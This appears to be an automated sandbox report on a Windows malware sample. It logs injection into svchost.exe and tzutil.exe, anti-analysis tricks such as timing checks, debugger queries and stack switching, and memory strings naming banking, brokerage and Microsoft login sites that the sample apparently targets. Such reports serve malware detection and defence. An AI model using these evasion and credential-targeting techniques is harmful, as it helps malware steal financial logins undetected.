                Source: 01152-11-12-24.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 01152-11-12-24.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 01152-11-12-24.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 01152-11-12-24.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 01152-11-12-24.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_008F4B37 LoadLibraryA,GetProcAddress,0_2_008F4B37
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00918945 push ecx; ret 0_2_00918958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00416857 push esp; iretd 7_2_00416858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040D8D0 push esp; iretd 7_2_0040D8D1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004051E6 push esp; retf 7_2_00405205
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004032C0 push eax; ret 7_2_004032C2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040D352 push dword ptr [ebp-59622DFFh]; iretd 7_2_0040D358
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00414B13 pushad ; iretd 7_2_00414B78
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00414B85 pushad ; iretd 7_2_00414B78
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00414BA2 pushad ; iretd 7_2_00414B78
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004164A9 push es; retf 7_2_004164BD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00416505 push es; retf 7_2_004164BD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00413653 push ebx; retf 7_2_0041369C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0390225F pushad ; ret 7_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039027FA pushad ; ret 7_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039309AD push ecx; mov dword ptr [esp], ecx7_2_039309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0390283D push eax; iretd 7_2_03902858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03901368 push eax; iretd 7_2_03901369
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_038F225F pushad ; ret 11_2_038F27F9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_038F27FA pushad ; ret 11_2_038F27F9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039209AD push ecx; mov dword ptr [esp], ecx11_2_039209B6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_038F283D push eax; iretd 11_2_038F2858
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_038F1368 push eax; iretd 11_2_038F1369
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030AC61B push cs; iretd 11_2_030AC632
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030AC5E4 push cs; iretd 11_2_030AC632
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030A3594 push esp; iretd 11_2_030A3595
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030A1850 pushad ; iretd 11_2_030A18B5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030A18C2 pushad ; iretd 11_2_030A18B5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030A18DF pushad ; iretd 11_2_030A18B5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03091F23 push esp; retf 11_2_03091F42
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030A9FAF push esi; ret 11_2_030A9FBB
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030A9FB0 push esi; ret 11_2_030A9FBB
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_008F48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008F48D7
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00975376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00975376
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00913187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00913187
                Source: C:\Users\user\Desktop\01152-11-12-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\01152-11-12-24.exeAPI/Special instruction interceptor: Address: 1416094
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0397096E rdtsc 7_2_0397096E
                Source: C:\Users\user\Desktop\01152-11-12-24.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-105971
                Source: C:\Users\user\Desktop\01152-11-12-24.exeAPI coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\tzutil.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 8096Thread sleep count: 39 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 8096Thread sleep time: -78000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe TID: 8116Thread sleep time: -40000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\tzutil.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0095445A
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095C6D1 FindFirstFileW,FindClose,0_2_0095C6D1
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0095C75C
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0095EF95
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0095F0F2
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0095F3F3
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009537EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009537EF
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00953B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00953B12
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0095BCBC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030AC8A0 FindFirstFileW,FindNextFileW,FindClose,11_2_030AC8A0
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_008F49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008F49A0
                Source: 745o5K385.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 745o5K385.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 745o5K385.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 745o5K385.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 745o5K385.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 745o5K385.11.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: 745o5K385.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 745o5K385.11.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: 745o5K385.11.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 745o5K385.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: 745o5K385.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 745o5K385.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 745o5K385.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 745o5K385.11.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 745o5K385.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 745o5K385.11.drBinary or memory string: discord.comVMware20,11696492231f
                Source: hKAQraLbCUKXj.exe, 0000000C.00000002.3116899898.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
                Source: firefox.exe, 00000010.00000002.2017884858.000001FDF5A2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 745o5K385.11.drBinary or memory string: global block list test formVMware20,11696492231
                Source: 745o5K385.11.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: 745o5K385.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 745o5K385.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: tzutil.exe, 0000000B.00000002.3115425477.00000000032BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
                Source: 745o5K385.11.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 745o5K385.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 745o5K385.11.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: 745o5K385.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 745o5K385.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 745o5K385.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 745o5K385.11.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: 745o5K385.11.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 745o5K385.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 745o5K385.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 745o5K385.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0397096E rdtsc 7_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00417AA3 LdrLoadDll,7_2_00417AA3
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00963F09 BlockInput,0_2_00963F09
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_008F3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008F3B3A
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00925A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00925A7C
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_008F4B37 LoadLibraryA,GetProcAddress,0_2_008F4B37
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_01416360 mov eax, dword ptr fs:[00000030h]0_2_01416360
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_01416300 mov eax, dword ptr fs:[00000030h]0_2_01416300
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_01414CD0 mov eax, dword ptr fs:[00000030h]0_2_01414CD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03928397 mov eax, dword ptr fs:[00000030h]7_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03928397 mov eax, dword ptr fs:[00000030h]7_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03928397 mov eax, dword ptr fs:[00000030h]7_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392E388 mov eax, dword ptr fs:[00000030h]7_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392E388 mov eax, dword ptr fs:[00000030h]7_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392E388 mov eax, dword ptr fs:[00000030h]7_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395438F mov eax, dword ptr fs:[00000030h]7_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395438F mov eax, dword ptr fs:[00000030h]7_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DE3DB mov eax, dword ptr fs:[00000030h]7_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DE3DB mov eax, dword ptr fs:[00000030h]7_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DE3DB mov ecx, dword ptr fs:[00000030h]7_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DE3DB mov eax, dword ptr fs:[00000030h]7_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D43D4 mov eax, dword ptr fs:[00000030h]7_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D43D4 mov eax, dword ptr fs:[00000030h]7_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039EC3CD mov eax, dword ptr fs:[00000030h]7_2_039EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393A3C0 mov eax, dword ptr fs:[00000030h]7_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393A3C0 mov eax, dword ptr fs:[00000030h]7_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393A3C0 mov eax, dword ptr fs:[00000030h]7_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393A3C0 mov eax, dword ptr fs:[00000030h]7_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393A3C0 mov eax, dword ptr fs:[00000030h]7_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393A3C0 mov eax, dword ptr fs:[00000030h]7_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039383C0 mov eax, dword ptr fs:[00000030h]7_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039383C0 mov eax, dword ptr fs:[00000030h]7_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039383C0 mov eax, dword ptr fs:[00000030h]7_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039383C0 mov eax, dword ptr fs:[00000030h]7_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B63C0 mov eax, dword ptr fs:[00000030h]7_2_039B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394E3F0 mov eax, dword ptr fs:[00000030h]7_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394E3F0 mov eax, dword ptr fs:[00000030h]7_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394E3F0 mov eax, dword ptr fs:[00000030h]7_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039663FF mov eax, dword ptr fs:[00000030h]7_2_039663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039403E9 mov eax, dword ptr fs:[00000030h]7_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039403E9 mov eax, dword ptr fs:[00000030h]7_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039403E9 mov eax, dword ptr fs:[00000030h]7_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039403E9 mov eax, dword ptr fs:[00000030h]7_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039403E9 mov eax, dword ptr fs:[00000030h]7_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039403E9 mov eax, dword ptr fs:[00000030h]7_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039403E9 mov eax, dword ptr fs:[00000030h]7_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039403E9 mov eax, dword ptr fs:[00000030h]7_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392C310 mov ecx, dword ptr fs:[00000030h]7_2_0392C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A08324 mov eax, dword ptr fs:[00000030h]7_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A08324 mov ecx, dword ptr fs:[00000030h]7_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A08324 mov eax, dword ptr fs:[00000030h]7_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A08324 mov eax, dword ptr fs:[00000030h]7_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03950310 mov ecx, dword ptr fs:[00000030h]7_2_03950310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396A30B mov eax, dword ptr fs:[00000030h]7_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396A30B mov eax, dword ptr fs:[00000030h]7_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396A30B mov eax, dword ptr fs:[00000030h]7_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B035C mov eax, dword ptr fs:[00000030h]7_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B035C mov eax, dword ptr fs:[00000030h]7_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B035C mov eax, dword ptr fs:[00000030h]7_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B035C mov ecx, dword ptr fs:[00000030h]7_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B035C mov eax, dword ptr fs:[00000030h]7_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B035C mov eax, dword ptr fs:[00000030h]7_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FA352 mov eax, dword ptr fs:[00000030h]7_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D8350 mov ecx, dword ptr fs:[00000030h]7_2_039D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B2349 mov eax, dword ptr fs:[00000030h]7_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B2349 mov eax, dword ptr fs:[00000030h]7_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B2349 mov eax, dword ptr fs:[00000030h]7_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B2349 mov eax, dword ptr fs:[00000030h]7_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B2349 mov eax, dword ptr fs:[00000030h]7_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B2349 mov eax, dword ptr fs:[00000030h]7_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B2349 mov eax, dword ptr fs:[00000030h]7_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B2349 mov eax, dword ptr fs:[00000030h]7_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B2349 mov eax, dword ptr fs:[00000030h]7_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B2349 mov eax, dword ptr fs:[00000030h]7_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B2349 mov eax, dword ptr fs:[00000030h]7_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B2349 mov eax, dword ptr fs:[00000030h]7_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B2349 mov eax, dword ptr fs:[00000030h]7_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B2349 mov eax, dword ptr fs:[00000030h]7_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B2349 mov eax, dword ptr fs:[00000030h]7_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D437C mov eax, dword ptr fs:[00000030h]7_2_039D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A0634F mov eax, dword ptr fs:[00000030h]7_2_03A0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E284 mov eax, dword ptr fs:[00000030h]7_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E284 mov eax, dword ptr fs:[00000030h]7_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B0283 mov eax, dword ptr fs:[00000030h]7_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B0283 mov eax, dword ptr fs:[00000030h]7_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B0283 mov eax, dword ptr fs:[00000030h]7_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039402A0 mov eax, dword ptr fs:[00000030h]7_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039402A0 mov eax, dword ptr fs:[00000030h]7_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C62A0 mov eax, dword ptr fs:[00000030h]7_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C62A0 mov ecx, dword ptr fs:[00000030h]7_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C62A0 mov eax, dword ptr fs:[00000030h]7_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C62A0 mov eax, dword ptr fs:[00000030h]7_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C62A0 mov eax, dword ptr fs:[00000030h]7_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C62A0 mov eax, dword ptr fs:[00000030h]7_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393A2C3 mov eax, dword ptr fs:[00000030h]7_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393A2C3 mov eax, dword ptr fs:[00000030h]7_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393A2C3 mov eax, dword ptr fs:[00000030h]7_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393A2C3 mov eax, dword ptr fs:[00000030h]7_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393A2C3 mov eax, dword ptr fs:[00000030h]7_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039402E1 mov eax, dword ptr fs:[00000030h]7_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039402E1 mov eax, dword ptr fs:[00000030h]7_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039402E1 mov eax, dword ptr fs:[00000030h]7_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A062D6 mov eax, dword ptr fs:[00000030h]7_2_03A062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392823B mov eax, dword ptr fs:[00000030h]7_2_0392823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392A250 mov eax, dword ptr fs:[00000030h]7_2_0392A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03936259 mov eax, dword ptr fs:[00000030h]7_2_03936259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039EA250 mov eax, dword ptr fs:[00000030h]7_2_039EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039EA250 mov eax, dword ptr fs:[00000030h]7_2_039EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B8243 mov eax, dword ptr fs:[00000030h]7_2_039B8243
